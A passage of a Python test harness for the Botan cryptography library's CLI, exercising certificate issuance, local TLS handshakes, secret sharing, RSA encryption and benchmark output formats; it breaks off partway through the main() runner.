    secp256r1_pem = """-----BEGIN EC PARAMETERS-----
MIHgAgEBMCwGByqGSM49AQECIQD/////AAAAAQAAAAAAAAAAAAAAAP//////////
/////zBEBCD/////AAAAAQAAAAAAAAAAAAAAAP///////////////AQgWsY12Ko6
k+ez671VdpiGvGUdBrDMU7D2O848PifSYEsEQQRrF9Hy4SxCR/i85uVjpEDydwN9
gS3rM6D0oTlF2JjClk/jQuL+Gn+bjufrSnwPnhYrzjNXazFezsu2QGg3v1H1AiEA
/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVECAQE=
-----END EC PARAMETERS-----"""

    test_cli("ec_group_info", "secp256r1", secp256r1_info)
    test_cli("ec_group_info", "--pem secp256r1", secp256r1_pem)
def cli_cpuid_tests(_tmp_dir):
    """Sanity-check the cpuid command's flag listing."""
    cpuid_output = test_cli("cpuid", [])

    if not cpuid_output.startswith('CPUID flags:'):
        logging.error('Unexpected cpuid output "%s"' % (cpuid_output))

    valid_flag = re.compile('[a-z0-9_]+')
    # Skip the "CPUID flags: " prefix (13 characters), then vet each flag name
    for flag in cpuid_output[13:].split(' '):
        if flag != '' and valid_flag.match(flag) is None:
            logging.error('Unexpected CPUID flag name "%s"' % (flag))
def cli_cc_enc_tests(_tmp_dir):
    # Credit-card-number format-preserving encryption round trip.
    # NOTE(review): the decrypted value ends in ...27 while the encrypt input
    # ended in ...29 -- presumably cc_encrypt canonicalizes the trailing
    # (Luhn check) digit before encrypting; confirm against the cc_encrypt
    # implementation rather than assuming a bug here.
    test_cli("cc_encrypt", ["8028028028028029", "pass"], "4308989841607208")
    test_cli("cc_decrypt", ["4308989841607208", "pass"], "8028028028028027")
def cli_cert_issuance_tests(tmp_dir):
    """Issue and verify a three-level certificate chain.

    Generates three RSA keys, self-signs a root CA, uses it to sign an
    intermediate CA CSR, uses the intermediate to sign a leaf CSR, then
    verifies the full leaf -> intermediate -> root chain.
    """
    root_key = os.path.join(tmp_dir, 'root.key')
    root_crt = os.path.join(tmp_dir, 'root.crt')
    int_key = os.path.join(tmp_dir, 'int.key')
    int_crt = os.path.join(tmp_dir, 'int.crt')
    int_csr = os.path.join(tmp_dir, 'int.csr')
    leaf_key = os.path.join(tmp_dir, 'leaf.key')
    leaf_crt = os.path.join(tmp_dir, 'leaf.crt')
    leaf_csr = os.path.join(tmp_dir, 'leaf.csr')

    test_cli("keygen", ["--params=2048", "--output=" + root_key], "")
    test_cli("keygen", ["--params=2048", "--output=" + int_key], "")
    test_cli("keygen", ["--params=2048", "--output=" + leaf_key], "")

    # Root CA allows a chain of up to 2 further CAs below it
    test_cli("gen_self_signed",
             [root_key, "Root", "--ca", "--path-limit=2", "--output="+root_crt], "")

    test_cli("gen_pkcs10", "%s Intermediate --ca --output=%s" % (int_key, int_csr))
    test_cli("sign_cert", "%s %s %s --output=%s" % (root_crt, root_key, int_csr, int_crt))

    test_cli("gen_pkcs10", "%s Leaf --output=%s" % (leaf_key, leaf_csr))
    test_cli("sign_cert", "%s %s %s --output=%s" % (int_crt, int_key, leaf_csr, leaf_crt))

    # Fixed: the original was missing the comma after "cert_verify", which
    # implicitly concatenated the command name with its argument string and
    # so never actually ran cert_verify with the intended arguments.
    test_cli("cert_verify", "%s %s %s" % (leaf_crt, int_crt, root_crt),
             "Certificate passes validation checks")
def cli_timing_test_tests(_tmp_dir):
    """Run each timing_test suite briefly and validate the semicolon output."""
    result_format = re.compile('[0-9]+;[0-9];[0-9]+')

    for suite_name in ["bleichenbacher", "manger",
                       "ecdsa", "ecc_mul", "inverse_mod", "pow_mod",
                       "lucky13sec3", "lucky13sec4sha1",
                       "lucky13sec4sha256", "lucky13sec4sha384"]:
        result_lines = test_cli("timing_test",
                                [suite_name, "--measurement-runs=16", "--warmup-runs=3"],
                                None).split('\n')
        for result_line in result_lines:
            if result_format.match(result_line) is None:
                logging.error("Unexpected output in timing_test %s: %s", suite_name, result_line)
def cli_tls_ciphersuite_tests(_tmp_dir):
    """List ciphersuites for each policy/version pair and vet the names."""
    suite_format = re.compile('^[A-Z0-9_]+$')

    for pol in ['default', 'suiteb_128', 'suiteb_192', 'strict', 'all']:
        for ver in ['tls1.0', 'tls1.1', 'tls1.2']:
            # Only the 'all' policy is expected to list pre-1.2 suites
            if ver != 'tls1.2' and pol != 'all':
                continue
            listing = test_cli("tls_ciphers",
                               ["--version=" + ver, "--policy=" + pol],
                               None).split('\n')
            for suite_line in listing:
                if suite_format.match(suite_line) is None:
                    logging.error("Unexpected ciphersuite line %s", suite_line)
def cli_asn1_tests(_tmp_dir):
    """Feed a small PEM blob to asn1print and check the decoded structure."""
    # NOTE(review): the END marker below has six trailing dashes rather than
    # five -- presumably the PEM decoder tolerates this; confirm intentional.
    input_pem = """-----BEGIN BLOB-----
MCACAQUTBnN0cmluZzEGAQH/AgFjBAUAAAAAAAMEAP///w==
-----END BLOB------
"""

    # d= is nesting depth, l= is element length in bytes
    expected = """d= 0, l= 32: SEQUENCE
d= 1, l= 1: INTEGER 05
d= 1, l= 6: PRINTABLE STRING string
d= 1, l= 6: SET
d= 2, l= 1: BOOLEAN true
d= 2, l= 1: INTEGER 63
d= 1, l= 5: OCTET STRING 0000000000
d= 1, l= 4: BIT STRING FFFFFF"""

    test_cli("asn1print", "--pem -", expected, input_pem)
def cli_tls_socket_tests(tmp_dir):
    """Handshake a tls_server/tls_client subprocess pair and exchange data.

    Builds a throwaway ECDSA CA and server certificate, starts a one-client
    tls_server, connects a tls_client trusting that CA, writes a random
    message, and checks the handshake completed and the message appears in
    the client's output.
    """
    client_msg = b'Client message %d\n' % (random.randint(0, 2**128))
    server_port = random_port_number()
    priv_key = os.path.join(tmp_dir, 'priv.pem')
    ca_cert = os.path.join(tmp_dir, 'ca.crt')
    crt_req = os.path.join(tmp_dir, 'crt.req')
    server_cert = os.path.join(tmp_dir, 'server.crt')

    test_cli("keygen", ["--algo=ECDSA", "--params=secp256r1", "--output=" + priv_key], "")

    test_cli("gen_self_signed",
             [priv_key, "CA", "--ca", "--country=VT",
              "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert],
             "")

    # The self-signed CA is not trusted when verified without a trust root
    test_cli("cert_verify", ca_cert, "Certificate did not validate - Cannot establish trust")

    test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req))

    test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert))

    tls_server = subprocess.Popen([CLI_PATH, 'tls_server', '--max-clients=1',
                                   '--port=%d' % (server_port), server_cert, priv_key],
                                  stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    # Fixed sleeps give the subprocesses time to start/handshake.
    # NOTE(review): time-based synchronization may be flaky on slow hosts.
    wait_time = 1.0

    time.sleep(wait_time)

    tls_client = subprocess.Popen([CLI_PATH, 'tls_client', 'localhost',
                                   '--port=%d' % (server_port), '--trusted-cas=%s' % (ca_cert)],
                                  stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    time.sleep(wait_time)

    tls_client.stdin.write(client_msg)
    tls_client.stdin.flush()

    time.sleep(wait_time)

    (stdout, stderr) = tls_client.communicate()

    if stderr:
        logging.error("Got unexpected stderr output %s" % (stderr))

    if b'Handshake complete' not in stdout:
        logging.error('Failed to complete handshake: %s' % (stdout))

    # The message should appear in the client's output (presumably echoed
    # back by the server -- confirm against tls_server behavior)
    if client_msg not in stdout:
        logging.error("Missing client message from stdout %s" % (stdout))

    tls_server.communicate()
def cli_tls_http_server_tests(tmp_dir):
    """Start tls_http_server with a fresh cert and issue GET/POST over HTTPS."""
    if not check_for_command("tls_http_server"):
        return

    # Support both Python 3 (http.client) and Python 2 (httplib) layouts;
    # skip the test entirely if neither is available
    try:
        from http.client import HTTPSConnection
    except ImportError:
        try:
            from httplib import HTTPSConnection
        except ImportError:
            return
    import ssl

    server_port = random_port_number()

    priv_key = os.path.join(tmp_dir, 'priv.pem')
    ca_cert = os.path.join(tmp_dir, 'ca.crt')
    crt_req = os.path.join(tmp_dir, 'crt.req')
    server_cert = os.path.join(tmp_dir, 'server.crt')

    test_cli("keygen", ["--algo=ECDSA", "--params=secp384r1", "--output=" + priv_key], "")

    test_cli("gen_self_signed",
             [priv_key, "CA", "--ca", "--country=VT",
              "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert],
             "")

    test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req))

    test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert))

    # --max-clients=2 makes the server exit after serving both requests below
    tls_server = subprocess.Popen([CLI_PATH, 'tls_http_server', '--max-clients=2',
                                   '--port=%d' % (server_port), server_cert, priv_key],
                                  stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    # Give the server time to start listening
    wait_time = 1.0
    time.sleep(wait_time)

    context = ssl.create_default_context(cafile=ca_cert)
    conn = HTTPSConnection('localhost', port=server_port, context=context)
    conn.request("GET", "/")
    resp = conn.getresponse()

    if resp.status != 200:
        logging.error('Unexpected response status %d' % (resp.status))

    body = str(resp.read())

    if body.find('TLS negotiation with Botan 2.') < 0:
        logging.error('Unexpected response body')

    # POST is expected to be rejected with 405 Method Not Allowed
    conn.request("POST", "/logout")
    resp = conn.getresponse()

    if resp.status != 405:
        logging.error('Unexpected response status %d' % (resp.status))

    # Python 2's Popen.wait() takes no timeout argument
    if sys.version_info.major >= 3:
        rc = tls_server.wait(5) # pylint: disable=too-many-function-args
    else:
        rc = tls_server.wait()

    if rc != 0:
        logging.error("Unexpected return code from https_server %d", rc)
def cli_tls_proxy_tests(tmp_dir):
    """Run tls_proxy in front of a plain HTTP server and fetch through it.

    The proxy terminates TLS on proxy_port and forwards to a local
    HTTP server on server_port; two HTTPS GETs through the proxy must
    return the HTTP server's random payload.
    """
    # pylint: disable=too-many-locals,too-many-statements
    if not check_for_command("tls_proxy"):
        return

    # Support both Python 3 and Python 2 stdlib layouts; skip if unavailable
    try:
        from http.client import HTTPSConnection
    except ImportError:
        try:
            from httplib import HTTPSConnection
        except ImportError:
            return

    try:
        from http.server import HTTPServer, BaseHTTPRequestHandler
    except ImportError:
        try:
            from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
        except ImportError:
            return

    import ssl
    import threading

    server_port = random_port_number()
    proxy_port = random_port_number()

    # The two random ports must differ
    while server_port == proxy_port:
        proxy_port = random_port_number()

    priv_key = os.path.join(tmp_dir, 'priv.pem')
    ca_cert = os.path.join(tmp_dir, 'ca.crt')
    crt_req = os.path.join(tmp_dir, 'crt.req')
    server_cert = os.path.join(tmp_dir, 'server.crt')

    test_cli("keygen", ["--algo=ECDSA", "--params=secp384r1", "--output=" + priv_key], "")

    test_cli("gen_self_signed",
             [priv_key, "CA", "--ca", "--country=VT",
              "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert],
             "")

    test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req))

    test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert))

    # --max-clients=2 makes the proxy exit after the two requests below
    tls_proxy = subprocess.Popen([CLI_PATH, 'tls_proxy', str(proxy_port), '127.0.0.1', str(server_port),
                                  server_cert, priv_key, '--output=/tmp/proxy.err', '--max-clients=2'],
                                 stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    # Give the proxy time to start listening
    wait_time = 1.0
    time.sleep(wait_time)

    # Random payload lets us confirm the response really came from our server
    server_response = binascii.hexlify(os.urandom(32))

    def run_http_server():
        class Handler(BaseHTTPRequestHandler):

            def do_GET(self): # pylint: disable=invalid-name
                self.send_response(200)
                self.end_headers()
                self.wfile.write(server_response)

        httpd = HTTPServer(('', server_port), Handler)
        httpd.serve_forever()

    http_thread = threading.Thread(target=run_http_server)
    http_thread.daemon = True  # don't keep the interpreter alive at exit
    http_thread.start()

    time.sleep(wait_time)

    context = ssl.create_default_context(cafile=ca_cert)

    for _i in range(2):
        conn = HTTPSConnection('localhost', port=proxy_port, context=context)
        conn.request("GET", "/")
        resp = conn.getresponse()

        if resp.status != 200:
            logging.error('Unexpected response status %d' % (resp.status))

        body = resp.read()

        if body != server_response:
            logging.error('Unexpected response from server %s' % (body))

    # Python 2's Popen.wait() takes no timeout argument
    if sys.version_info.major >= 3:
        rc = tls_proxy.wait(5) # pylint: disable=too-many-function-args
    else:
        rc = tls_proxy.wait()

    if rc != 0:
        logging.error('Unexpected return code %d', rc)
def cli_trust_root_tests(tmp_dir):
    """Exercise trust_roots in DN-only and full PEM output modes.

    The DN-only listing is validated line by line against a loose
    attribute=value DN pattern; the PEM output is only checked to
    succeed.
    """
    pem_file = os.path.join(tmp_dir, 'pems')
    dn_file = os.path.join(tmp_dir, 'dns')

    test_cli("trust_roots", ['--dn-only', '--output=%s' % (dn_file)], "")

    dn_re = re.compile('(.+=\".+\")(,.+=\".+\")')

    # Use a context manager so the file handle is closed deterministically
    # (the original iterated an anonymous open() and leaked the handle)
    with open(dn_file) as dns:
        for line in dns:
            if dn_re.match(line) is None:
                logging.error("Unexpected DN line %s", line)

    test_cli("trust_roots", ['--output=%s' % (pem_file)], "")
def cli_tss_tests(tmp_dir):
    """Split a random secret with TSS and recover it from share subsets."""
    data_file = os.path.join(tmp_dir, 'data')
    exp_hash = "53B3C59276AE30EA7FD882268E80FD96AD80CC9FEB15F9FB940E7C4B5CF80B9E"

    # Create the secret and record its expected digest
    test_cli("rng", ["32", "--output=%s" % (data_file)], "")
    test_cli("hash", ["--no-fsname", data_file], exp_hash)

    threshold = 3
    share_count = 5

    test_cli("tss_split", [str(threshold), str(share_count), data_file,
                           "--share-prefix=%s/split" % (tmp_dir)], "")

    share_files = []
    for share_idx in range(1, share_count + 1):
        share_path = os.path.join(tmp_dir, "split%d.tss" % (share_idx))
        if not os.access(share_path, os.R_OK):
            logging.error("Failed to create expected split file %s", share_path)
        share_files.append(share_path)

    # Recovery works with 5, 4, or 3 shares (threshold is 3)
    for dropped in [0, 1, 2]:
        recovered = os.path.join(tmp_dir, "recovered_%d" % (share_count - dropped))
        test_cli("tss_recover", share_files[dropped:] + ["--output=%s" % (recovered)], "")
        test_cli("hash", ["--no-fsname", recovered], exp_hash)

    # ...but fails with only 2 shares
    rec2 = os.path.join(tmp_dir, "recovered_2")
    test_cli("tss_recover", share_files[3:] + ["--output=%s" % (rec2)], "", None,
             b'Error: Insufficient shares to do TSS reconstruction\n')
def cli_pk_encrypt_tests(tmp_dir):
    """RSA keygen/encrypt/decrypt round trip with fixed expected digests.

    The CLI under test uses a fixed DRBG, so key generation, the random
    input, and the ciphertext are all deterministic and can be checked
    by SHA-256 digest.
    """
    input_file = os.path.join(tmp_dir, 'input')
    ctext_file = os.path.join(tmp_dir, 'ctext')
    recovered_file = os.path.join(tmp_dir, 'recovered')
    rsa_priv_key = os.path.join(tmp_dir, 'rsa.priv')
    rsa_pub_key = os.path.join(tmp_dir, 'rsa.pub')

    test_cli("keygen", ["--algo=RSA", "--provider=base", "--params=2048", "--output=%s" % (rsa_priv_key)], "")

    # Deterministic DRBG -> the generated private key is always the same
    key_hash = "72AF3227EF57A728E894D54623EB8E2C0CD11A4A98BF2DF32DB052BF60897873"
    test_cli("hash", ["--no-fsname", "--algo=SHA-256", rsa_priv_key], key_hash)

    # Extract the public half of the key
    test_cli("pkcs8", ["--pub-out", "%s/rsa.priv" % (tmp_dir), "--output=%s" % (rsa_pub_key)], "")

    # Generate a random input file
    test_cli("rng", ["10", "16", "32", "--output=%s" % (input_file)], "")

    # Because we used a fixed DRBG for each invocation the same ctext is generated each time
    rng_output_hash = "32F5E7B61357DE8397EFDA1E598379DFD5EE21767BDF4E2A435F05117B836AC6"
    ctext_hash = "FF1F0EEC2C42DD61D78505C5DF624A19AE6FE2BAB0B8F7D878C7655D54C68FE0"

    test_cli("hash", ["--no-fsname", "--algo=SHA-256", input_file], rng_output_hash)

    # Encrypt and verify ciphertext is the expected value
    test_cli("pk_encrypt", [rsa_pub_key, input_file, "--output=%s" % (ctext_file)], "")
    test_cli("hash", ["--no-fsname", "--algo=SHA-256", ctext_file], ctext_hash)

    # Decrypt and verify plaintext is recovered
    test_cli("pk_decrypt", [rsa_priv_key, ctext_file, "--output=%s" % (recovered_file)], "")
    test_cli("hash", ["--no-fsname", "--algo=SHA-256", recovered_file], rng_output_hash)
def cli_uuid_tests(_tmp_dir):
    """Check uuid output: known first value plus general format."""
    # First invocation is deterministic under the fixed test DRBG
    test_cli("uuid", [], "D80F88F6-ADBE-45AC-B10C-3602E67D985B")

    uuid_format = re.compile(r'[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}')
    generated = test_cli("uuid", [])
    if uuid_format.match(generated) is None:
        logging.error('Bad uuid output %s' % (generated))
def cli_tls_client_hello_tests(_tmp_dir):
    """Parse a captured TLS client hello and check the digest of the report."""
    # pylint: disable=line-too-long
    # Hex dump of a recorded TLS client hello record
    chello = "16030100cf010000cb03035b3cf2457b864d7bef2a4b1f84fc3ced2b68d9551f3455ffdd305af277a91bb200003a16b816b716ba16b9cca9cca8c02cc030c02bc02fc0adc0acc024c00ac028c014c023c009c027c013ccaa009f009ec09fc09e006b003900670033010000680000000e000c000009676d61696c2e636f6d000500050100000000000a001a0018001d0017001a0018001b0019001c01000101010201030104000b00020100000d00140012080508040806050106010401050306030403001600000017000000230000ff01000100"

    output = test_cli("tls_client_hello", ["--hex", "-"], None, chello)

    # The decoded report is itself checked via its SHA-256 digest rather
    # than by comparing the (long) expected text
    output_hash = "8EBFC3205ACFA98461128FE5D081D19254237AF84F7DAF000A3C992C3CF6DE44"
    test_cli("hash", ["--no-fsname", "--algo=SHA-256", "-"], output_hash, output)
def cli_speed_pk_tests(_tmp_dir):
    """Run speed over the public key algorithms and validate report lines."""
    algos = ["ECDSA", "ECDH", "SM2", "ECKCDSA", "ECGDSA", "GOST-34.10",
             "DH", "DSA", "ElGamal", "Ed25519", "Curve25519", "NEWHOPE", "McEliece",
             "RSA", "RSA_keygen", "XMSS"]

    report = test_cli("speed", ["--msec=1"] + algos, None).split('\n')

    # Example: ECDSA-secp256r1 106 keygen/sec; 9.35 ms/op 37489733 cycles/op (1 op in 9 ms)
    line_format = re.compile(r'^.* [0-9]+ ([A-Za-z ]+)/sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)')

    for report_line in report:
        if line_format.match(report_line) is None:
            logging.error("Unexpected line %s", report_line)
def cli_speed_pbkdf_tests(_tmp_dir):
    """Run speed over the password hashing schemes and validate report lines."""
    line_format = re.compile(r'^.* [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9]+(\.[0-9]+)? ms\)')

    for scheme in ['bcrypt', 'passhash9', 'argon2']:
        report = test_cli("speed", ["--msec=1", scheme], None).split('\n')
        for report_line in report:
            if line_format.match(report_line) is None:
                logging.error("Unexpected line %s", report_line)
def cli_speed_table_tests(_tmp_dir):
    """Check the line-by-line layout of speed's --format=table output."""
    msec = 1

    version_re = re.compile(r'^Botan 2\.[0-9]+\.[0-9] \(.*, revision .*, distribution .*\)')
    cpuid_re = re.compile(r'^CPUID: [a-z_0-9 ]*$')
    format_re = re.compile(r'^AES-128 .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)')
    tbl_hdr_re = re.compile(r'^algo +operation +1024 bytes$')
    tbl_val_re = re.compile(r'^AES-128 +(encrypt|decrypt) +[0-9]+(\.[0-9]{2})$')

    output = test_cli("speed", ["--format=table", "--provider=base", "--msec=%d" % (msec), "AES-128"], None).split('\n')

    # Expected layout:
    #  0: version banner
    #  1: CPUID line (may be empty)
    #  2: blank
    #  3-4: per-direction throughput lines
    #  5: blank
    #  6: table header, 7-8: encrypt/decrypt rows
    #  9: blank
    # 10: trailing explanation
    if len(output) != 11:
        logging.error('Unexpected number of lines from table output')

    if version_re.match(output[0]) is None:
        logging.error("Unexpected version line %s", output[0])

    # Line 1 is either a CPUID line or empty; when empty, line 2 must also
    # be a blank separator
    if output[1] != '':
        if cpuid_re.match(output[1]) is None:
            logging.error("Unexpected cpuid line %s", output[1])
    elif output[2] != '':
        logging.error("Expected newline got %s", output[2])

    if format_re.match(output[3]) is None:
        logging.error("Unexpected line %s", output[3])
    if format_re.match(output[4]) is None:
        logging.error("Unexpected line %s", output[4])
    if output[5] != '':
        logging.error("Expected newline got %s", output[5])

    if tbl_hdr_re.match(output[6]) is None:
        logging.error("Unexpected table header %s", output[6])
    if tbl_val_re.match(output[7]) is None:
        logging.error("Unexpected table header %s", output[7])
    if tbl_val_re.match(output[8]) is None:
        logging.error("Unexpected table header %s", output[8])

    if output[9] != '':
        logging.error("Expected newline got %s", output[9])
    if output[10].find('results are the number of 1000s bytes processed per second') < 0:
        logging.error("Unexpected trailing message got %s", output[10])
def cli_speed_invalid_option_tests(_tmp_dir):
    """Ensure speed rejects bad options with the usage text on stderr."""
    speed_usage = b"Usage: speed --msec=500 --format=default --ecc-groups= --provider= --buf-size=1024 --clear-cpuid= --cpu-clock-speed=0 --cpu-clock-ratio=1.0 *algos\n"

    usage_errors = [
        ("--buf-size=0", b"Usage error: Cannot have a zero-sized buffer\n"),
        ("--buf-size=F00F", b"Usage error: Invalid integer value 'F00F' for option buf-size\n"),
        ("--buf-size=90000000", b"Usage error: Specified buffer size is too large\n"),
    ]
    for bad_option, error_msg in usage_errors:
        test_cli("speed", [bad_option, "--msec=1", "AES-128"],
                 expected_stderr=error_msg + speed_usage)

    # An unknown CPUID flag only warns; the usage text is not printed
    test_cli("speed", ["--clear-cpuid=goku", "--msec=1", "AES-128"],
             expected_stderr=b"Warning don't know CPUID flag 'goku'\n")
def cli_speed_math_tests(_tmp_dir):
    """Run speed over the math/bigint operations and validate report lines."""
    # these all have a common output format
    line_format = re.compile(r'^.* [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9]+(\.[0-9]+)? ms\)')

    for math_op in ['mp_mul', 'mp_div', 'mp_div10', 'modexp', 'random_prime', 'inverse_mod',
                    'rfc3394', 'fpe_fe1', 'ecdsa_recovery', 'ecc_init', 'poly_dbl',
                    'bn_redc', 'nistp_redc', 'ecc_mult', 'ecc_ops', 'os2ecp', 'primality_test']:
        report = test_cli("speed", ["--msec=1", math_op], None).split('\n')
        for report_line in report:
            if line_format.match(report_line) is None:
                logging.error("Unexpected line %s", report_line)
def cli_speed_tests(_tmp_dir):
    """Smoke-test speed over ciphers, hashes, KDFs, RNGs, entropy and JSON."""
    # pylint: disable=too-many-branches
    msec = 1

    # Block cipher with two buffer sizes
    output = test_cli("speed", ["--msec=%d" % (msec), "--buf-size=64,512", "AES-128"], None).split('\n')

    # 2 buffer sizes * encrypt/decrypt -> expect a multiple of 4 lines
    # NOTE(review): the factor of 4 is inferred from the invocation; confirm
    # against the speed command's per-direction output
    if len(output) % 4 != 0:
        logging.error("Unexpected number of lines for AES-128 speed test")

    # pylint: disable=line-too-long
    format_re = re.compile(r'^AES-128 .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)')
    for line in output:
        if format_re.match(line) is None:
            logging.error("Unexpected line %s", line)

    # Stream cipher, hash, and MAC share a throughput line format
    output = test_cli("speed", ["--msec=%d" % (msec), "ChaCha20", "SHA-256", "HMAC(SHA-256)"], None).split('\n')

    # pylint: disable=line-too-long
    format_re = re.compile(r'^.* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)')
    for line in output:
        if format_re.match(line) is None:
            logging.error("Unexpected line %s", line)

    # AEAD mode: lines are either key schedule rates or cipher throughput
    output = test_cli("speed", ["--msec=%d" % (msec), "AES-128/GCM"], None).split('\n')
    format_re_ks = re.compile(r'^AES-128/GCM\(16\).* [0-9]+ key schedule/sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)')
    format_re_cipher = re.compile(r'^AES-128/GCM\(16\) .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)')
    for line in output:
        if format_re_ks.match(line) is None:
            if format_re_cipher.match(line) is None:
                logging.error('Unexpected line %s', line)

    # Password hashing (scrypt) has its own parameterized line format
    output = test_cli("speed", ["--msec=%d" % (msec), "scrypt"], None).split('\n')

    format_re = re.compile(r'^scrypt-[0-9]+-[0-9]+-[0-9]+ \([0-9]+ MiB\) [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)')

    for line in output:
        if format_re.match(line) is None:
            logging.error("Unexpected line %s", line)

    output = test_cli("speed", ["--msec=%d" % (msec), "RNG"], None).split('\n')

    # ChaCha_RNG generate buffer size 1024 bytes: 954.431 MiB/sec 4.01 cycles/byte (477.22 MiB in 500.00 ms)
    format_re = re.compile(r'^.* generate buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms')
    for line in output:
        if format_re.match(line) is None:
            logging.error("Unexpected line %s", line)

    # Entropy source rdseed output 128 bytes estimated entropy 0 in 0.02168 ms total samples 32
    output = test_cli("speed", ["--msec=%d" % (msec), "entropy"], None).split('\n')

    format_re = re.compile(r'^Entropy source [_a-z0-9]+ output [0-9]+ bytes estimated entropy [0-9]+ in [0-9]+\.[0-9]+ ms .*total samples [0-9]+')
    for line in output:
        if format_re.match(line) is None:
            logging.error("Unexpected line %s", line)

    # JSON output: every record must carry the full set of fields
    output = test_cli("speed", ["--msec=%d" % (msec), "--format=json", "AES-128"], None)

    json_blob = json.loads(output)
    if len(json_blob) < 2:
        logging.error("Unexpected size for JSON output")

    for b in json_blob:
        for field in ['algo', 'op', 'events', 'bps', 'buf_size', 'nanos']:
            if field not in b:
                logging.error('Missing field %s in JSON record %s' % (field, b))
def run_test(fn_name, fn):
    """Run a single CLI test function in its own scratch directory.

    Creates a temp directory for the test, logs any exception the test
    raises (tests report failures via logging, not by raising), always
    removes the directory afterwards, and logs the elapsed time.
    """
    start = time.time()
    tmp_dir = tempfile.mkdtemp(prefix='botan_cli_')
    try:
        fn(tmp_dir)
    except Exception as e: # pylint: disable=broad-except
        logging.error("Test %s threw exception: %s", fn_name, e)
    finally:
        # BUG FIX: cleanup now runs even if fn raises something that is not
        # an Exception (e.g. KeyboardInterrupt), so the temp directory is
        # never leaked.
        shutil.rmtree(tmp_dir)
    end = time.time()
    logging.info("Ran %s in %.02f sec", fn_name, end-start)
def main(args=None):
    """Entry point for the botan CLI test suite.

    Parses options, locates the botan CLI binary (first positional
    argument), optionally filters test functions by a regex (second
    positional argument), then runs them either serially or on a thread
    pool.  Returns a process exit code: 0 on success, 1 on test failures
    or a bad regex, 2 if the CLI binary is not executable.
    """
    # pylint: disable=too-many-branches,too-many-locals
    if args is None:
        args = sys.argv
    parser = optparse.OptionParser(
        formatter=optparse.IndentedHelpFormatter(max_help_position=50))
    parser.add_option('--verbose', action='store_true', default=False)
    parser.add_option('--quiet', action='store_true', default=False)
    # 0 means "auto": use one worker per CPU (see below).
    parser.add_option('--threads', action='store', type='int', default=0)
    (options, args) = parser.parse_args(args)
    setup_logging(options)
    if len(args) < 2:
        logging.error("Usage: %s path_to_botan_cli [test_regex]", args[0])
        return 1
    # The CLI binary must exist and be executable before anything else runs.
    if not os.access(args[1], os.X_OK):
        logging.error("Could not access/execute %s", args[1])
        return 2
    threads = options.threads
    if threads == 0:
        threads = multiprocessing.cpu_count()
    # Test helpers read the binary path from this module-level global.
    global CLI_PATH
    CLI_PATH = args[1]
    test_regex = None
    if len(args) == 3:
        try:
            test_regex = re.compile(args[2])
        except re.error as e:
            logging.error("Invalid regex: %s", str(e))
            return 1
    # some of the slowest tests are grouped up front
    test_fns = [
        cli_speed_tests,
        cli_speed_pk_tests,
        cli_speed_math_tests,
        cli_speed_pbkdf_tests,
        cli_speed_table_tests,
        cli_speed_invalid_option_tests,
        cli_xmss_sign_tests,
        cli_argon2_tests,
        cli_asn1_tests,
        cli_base32_tests,
        cli_base58_tests,
        cli_base64_tests,
        cli_bcrypt_tests,
        cli_cc_enc_tests,
        cli_cycle_counter,
        cli_cert_issuance_tests,
        cli_compress_tests,
        cli_config_tests,
        cli_cpuid_tests,
        cli_dl_group_info_tests,
        cli_ec_group_info_tests,
        cli_entropy_tests,
        cli_factor_tests,
        cli_gen_dl_group_tests,
        cli_gen_prime_tests,
        cli_hash_tests,
        cli_help_tests,
        cli_hex_tests,
        cli_hmac_tests,
        cli_is_prime_tests,
        cli_key_tests,
        cli_mod_inverse_tests,
        cli_pbkdf_tune_tests,
        cli_pk_encrypt_tests,
        cli_pk_workfactor_tests,
        cli_psk_db_tests,
        cli_rng_tests,
        cli_roughtime_check_tests,
        cli_roughtime_tests,
        cli_timing_test_tests,
        cli_tls_ciphersuite_tests,
        cli_tls_client_hello_tests,
        cli_tls_http_server_tests,
        cli_tls_proxy_tests,
        cli_tls_socket_tests,
        cli_trust_root_tests,
        cli_tss_tests,
        cli_uuid_tests,
        cli_version_tests,
    ]
    # Select the tests whose function name matches the optional regex.
    tests_to_run = []
    for fn in test_fns:
        fn_name = fn.__name__
        if test_regex is None or test_regex.search(fn_name) is not None:
            tests_to_run.append((fn_name, fn))
    start_time = time.time()
